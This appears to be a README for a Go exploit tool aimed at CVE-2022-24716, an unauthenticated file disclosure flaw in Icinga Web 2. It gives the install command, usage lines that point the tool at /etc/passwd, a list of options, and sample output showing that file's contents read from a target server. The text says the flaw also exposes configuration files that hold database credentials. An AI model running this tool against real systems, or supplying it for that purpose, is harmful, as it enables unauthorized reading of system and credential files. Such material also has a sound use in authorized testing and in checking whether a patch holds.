CVE-2022-24716
Icinga Web 2 is an open source monitoring web interface, framework and command line interface. Unauthenticated users can leak the contents of user-accessible local system files from the web server, including icingaweb2 configuration files with database credentials.
Installation
CVE-2022-24716 requires golang and to download it just use:
go install -v github.com/joaoviictorti/CVE-2022-24716@latestUsage
go run .\CVE-2022-24716.go -u http://localhost -f /etc/passwd
go run .\CVE-2022-24716.go -u http://localhost -f /etc/passwd -p http://127.0.0.1:8080This will display help for the tool. Here are all the switches it supports:
usage: CVE-2022-24716 [-h|--help] -u|--url "<value>" -f|--file "<value>"
[-p|--proxy "<value>"]
CVE-2022-24716 - Arbitrary File Disclosure
Arguments:
-h --help Print help information
-u --url Insert url
-f --file Insert file
-p --proxy Insert proxyRunning CVE-2022-24716
go run .\CVE-2022-24716.go -u http://icinga.cerberus.local:8080 -f /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
......